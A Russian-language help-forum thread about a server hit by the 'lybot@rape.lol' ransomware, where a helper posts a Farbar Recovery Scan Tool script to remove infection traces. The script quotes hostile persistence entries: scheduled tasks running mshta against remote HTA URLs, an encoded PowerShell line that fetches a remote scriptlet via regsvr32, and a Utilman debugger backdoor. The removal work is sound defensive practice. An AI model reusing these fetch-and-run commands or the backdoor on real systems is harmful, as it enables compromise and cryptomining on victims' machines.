• Внимание. Восстановление баз 1С7, 1C8 и Mssql после атаки шифровальщика, подробности и отзывы читайте в профильной теме.

    Внимание. Восстановление архивов RAR и ZIP, образов Acronis и виртуальных машин, баз почтовых программ после атаки шифровальщика, подробности и отзывы читайте в профильной теме.

Решена без расшифровки email-lybot@rape.lol.ver-CL 1.5.1.0.id

sweetzy

Новый пользователь
Сообщения
5
Реакции
0
Добрый день,

Прошу вашей помощи с расшифровкой файлов на сервере.
Логи FRST и зашифрованные файлы во вложении.
 

Вложения

  • FRST.zip
    14.2 KB · Просмотры: 1
  • Files.zip
    162.5 KB · Просмотры: 2
1. Выделите следующий код:
Код:
Start::
CreateRestorePoint:
(Microsoft Corporation) [File not signed] C:\Windows\services.exe
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
IFEO\Utilman.exe: [Debugger] cmd.exe
Task: {13B15947-9971-41F8-B26E-6E9670798DEC} - System32\Tasks\Microsoft\Windows\Diagnosis\ScheduledDiagnosis => cmd /c mshta hxxps://qm7gmtaagejolddt.onion.to/check.hta <==== ATTENTION
Task: {18F36BEA-9157-4E7C-B91E-2A6F24300581} - System32\Tasks\Microsoft\Windows\WDI\UPD => cmd /c mshta hxxp://eu1.minerpool.pw/upd.hta <==== ATTENTION
Task: {24774D0D-0857-40F8-A528-6724796535B2} - System32\Tasks\Microsoft\Windows\Ras\WinSockets => c:\windows\services.exe [992768 2019-07-02] (Microsoft Corporation) [File not signed] <==== ATTENTION
Task: {2AD3BA63-7A55-4E58-BE2D-AA8850FF774B} - System32\Tasks\Microsoft\Windows Defender\ScannerSchduler => cmd /c mshta hxxp://res1.myrms.pw/upd.hta <==== ATTENTION
Task: {4104DAA4-8086-4C76-AF3E-4F9A56C7297B} - System32\Tasks\Microsoft\Windows\Shell\WindowsParentalControlsSettings => cmd /c mshta hxxp://eu1.minerpool.pw/check.hta <==== ATTENTION
Task: {65088F42-FA2A-4220-8B32-FFDE153A93E0} - System32\Tasks\Microsoft\Windows\Tcpip\IpAddressConflict => cmd /c mshta hxxps://107.181.187.132/check.hta <==== ATTENTION
Task: {AEE3A4FD-C45E-43E7-8C67-9412A5D4FB52} - System32\Tasks\Microsoft\Windows\PLA\System\PlaConfig => cmd /c C:\Windows\Fonts\wwe.bat <==== ATTENTION
Task: {E62DFB06-E36F-4D04-8C13-7090CBB76695} - System32\Tasks\Microsoft\Windows\Multimedia\SystemVideoService => cmd /c powershell  -nop -noni -w 1 -enc cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcAA6AC8ALwAxADAANwAuADEAOAAxAC4AMQA4ADcALgAxADMAMgAvAHAAaABwAC8AZgB1AG4AYwAuAHAAaABwACAAcwBjAHIAbwBiAGoALgBkAGwAbAA=
S2 WindowsCertificateService; C:\Windows\Media\Long\certsvc.exe [2653184 2019-06-24] () [File not signed]
S2 WinMediaService; C:\Windows\msapss\bin\msapp.exe [2150400 2019-06-24] () [File not signed]
S4 cli_optimization_v2.0.55728_32; cmd /c mshta https://qm7gmtaagejolddt.onion.to/check.hta [X]
S2 cli_optimization_v2.0.55728_64; cmd /c mshta  http://eu1.minerpool.pw/check.hta [X]
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Siebel\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Siebel\Downloads\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Siebel\Documents\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Siebel\Desktop\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Siebel\AppData\Roaming\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Siebel\AppData\Roaming\Microsoft\Windows\Start Menu\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Siebel\AppData\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Siebel\AppData\LocalLow\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Public\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Public\Downloads\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\iserikov\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\iserikov\Downloads\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\iserikov\Documents\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\iserikov\Desktop\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\iserikov\AppData\Roaming\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\iserikov\AppData\Roaming\Microsoft\Windows\Start Menu\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\iserikov\AppData\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\iserikov\AppData\LocalLow\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default\Downloads\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default\Documents\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default\Desktop\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default\AppData\Roaming\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default\AppData\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default User\Downloads\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default User\Documents\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default User\Desktop\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default User\AppData\Roaming\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default User\AppData\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Administrator\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Administrator\Downloads\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Administrator\Documents\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Administrator\Desktop\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Administrator\AppData\Roaming\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Administrator\AppData\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Administrator\AppData\LocalLow\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\README.txt
2019-06-24 10:25 - 2019-06-24 10:50 - 000001253 _____ C:\Users\Public\Documents\email-lybot@rape.lol.ver-CL 1.5.1.0.id-.fname-README.txt.doubleoffset
2019-06-24 10:25 - 2019-06-24 10:50 - 000001253 _____ C:\Users\Public\Desktop\email-lybot@rape.lol.ver-CL 1.5.1.0.id-.fname-README.txt.doubleoffset
2019-06-24 10:25 - 2019-06-24 10:50 - 000001253 _____ C:\Users\email-lybot@rape.lol.ver-CL 1.5.1.0.id-.fname-README.txt.doubleoffset
2019-06-24 10:25 - 2019-06-24 10:50 - 000001253 _____ C:\ProgramData\email-lybot@rape.lol.ver-CL 1.5.1.0.id-.fname-README.txt.doubleoffset
2019-06-24 10:25 - 2019-06-24 10:50 - 000000056 _____ C:\Users\README.txt
2019-06-24 10:25 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Public\Documents\README.txt
2019-06-24 10:25 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Public\Desktop\README.txt
2019-06-24 10:25 - 2019-06-24 10:50 - 000000056 _____ C:\ProgramData\README.txt
2019-06-24 10:25 - 2019-06-24 10:25 - 000000056 _____ C:\ProgramData\Microsoft\Windows\Start Menu\README.txt
2019-06-24 10:25 - 2019-06-24 10:25 - 000000056 _____ C:\Program Files\README.txt
2019-06-24 10:25 - 2019-06-24 10:25 - 000000056 _____ C:\Program Files\Common Files\README.txt
2019-06-24 10:25 - 2019-06-24 10:25 - 000000056 _____ C:\Program Files (x86)\README.txt
2019-06-24 10:20 - 2019-06-10 20:39 - 000471552 _____ C:\Users\Siebel\Downloads\ruka.exe
2019-06-24 10:19 - 2019-06-24 10:19 - 000000000 ____D C:\Windows\msapss
2019-06-20 13:24 - 2019-07-02 16:13 - 000000009 _____ C:\ProgramData\zom.exe
2019-06-20 13:24 - 2019-07-02 16:13 - 000000008 _____ C:\Windows\xDLS.exe
2019-06-20 13:24 - 2019-07-02 16:13 - 000000008 _____ C:\Windows\SysWOW64\winscreen.exe
2019-06-20 13:24 - 2019-07-02 16:13 - 000000008 _____ C:\Windows\SysWOW64\winclip.exe
2019-06-20 13:24 - 2019-07-02 16:13 - 000000008 _____ C:\Windows\SysWOW64\update.exe
2019-06-20 13:24 - 2019-07-02 16:13 - 000000008 _____ C:\Windows\SysWOW64\System32.exe
2019-06-20 13:24 - 2019-07-02 16:13 - 000000008 _____ C:\ProgramData\Iostream.exe
2019-06-20 13:24 - 2019-07-02 16:12 - 000000008 _____ C:\Windows\SysWOW64\cssrs.exe
2019-06-20 13:24 - 2019-07-02 16:12 - 000000008 _____ C:\Windows\system32\cry.exe
2019-06-20 13:24 - 2019-07-02 16:10 - 000000009 _____ C:\Windows\system32\ex.exe
2019-06-20 13:24 - 2019-07-02 16:10 - 000000008 _____ C:\Windows\system32\Info.hta
2019-06-20 13:24 - 2019-07-02 15:56 - 000000008 _____ C:\Windows\system32\lock.exe
2019-06-20 13:24 - 2019-07-02 15:55 - 000000008 _____ C:\Windows\system32\8UPAB0_payload.exe
2019-06-20 13:24 - 2019-07-02 13:58 - 000992768 _____ (Microsoft Corporation) C:\Windows\services.exe
End::
2. Скопируйте выделенный текст (правая кнопка мышиКопировать).
3. Запустите Farbar Recovery Scan Tool.
4. Нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.
  • Обратите внимание: перезагрузку компьютера нужно выполнить вручную осле скрипта.
 
Добрый день,

Уточните где выполнить скрипт, Powershell?

FIXlog во вложении.
 

Вложения

  • Fixlog_03-07-2019 08.13.32.txt
    15.9 KB · Просмотры: 2
Понятно, видимо FRST сам из буфера забрал скрипт.
 
Поищите пару - шифрованный_файл/оригинал_до_шифрования - и прикрепите в архиве к следующему сообщению. Размер незашифрованного файла должен быть не менее 256 байт.
 
Не удалось найти оригинальных файлов.
 
Без этого расшифровку предоставить невозможно. Стандартные обои для Рабочего стола, которые записываются на компьютер при установке системы по идее тоже должны быть зашифрованы. Найдите их оригиналы для подобной системы и будет Вам пара.
 
  • Like
Реакции: akok
+
Ищите такой в бэкапах, в почте, на других ПК и т.д.
 
  • Like
Реакции: akok
Добрый день,

Большое спасибо за помощь, сервер уже убили. Был бэк-ап VPS.

Можно закрыть топик.
 
Хорошо. Удачи!
 
Назад
Сверху Снизу